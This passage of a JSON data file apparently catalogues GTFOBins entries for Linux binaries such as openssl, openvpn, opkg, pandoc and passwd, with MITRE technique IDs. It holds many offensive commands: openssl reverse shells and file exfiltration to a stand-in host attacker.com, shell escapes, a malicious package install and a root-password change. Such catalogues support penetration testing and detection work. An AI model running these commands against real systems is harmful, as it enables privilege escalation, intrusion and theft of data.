installation","aliases":[]},{"id":"gtfo:opencode:inherit:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:inherit:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:download:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:download:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:download:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-read:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-read:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-read:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:1:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:1:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:1:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:library-load:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:library-load:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:library-load:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:reverse-shell:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:reverse-shell:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:reverse-shell:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:upload:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:upload:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:upload:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:file-read:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:file-read:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:file-read:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:shell:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:shell:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:shell:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvt:command:0:sudo","toolId":"gtfo:openvt","toolName":"openvt","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"openvt -- /path/to/command","description":"The command execution is displayed on the virtual console.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opkg:shell:0:sudo","toolId":"gtfo:opkg","toolName":"opkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm opkg install x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-read:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-read:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-read:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-write:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-write:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-write:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:inherit:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:inherit:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:inherit:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:passwd:privilege-escalation:0:sudo","toolId":"gtfo:passwd","toolName":"passwd","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"echo -e 'x\\nx' | passwd","description":"This changes the root password to `x`, so it's now possible to log in using, for example, `su`.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/passwd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:paste:file-read:0:sudo","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/paste/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:paste:file-read:0:suid","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/paste/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:paste:file-read:0:unprivileged","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/paste/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pax:file-read:0:sudo","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pax:file-read:0:suid","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pax:file-read:0:unprivileged","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdb:inherit:0:sudo","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdb:inherit:0:unprivileged","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-read:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-read:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-read:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF 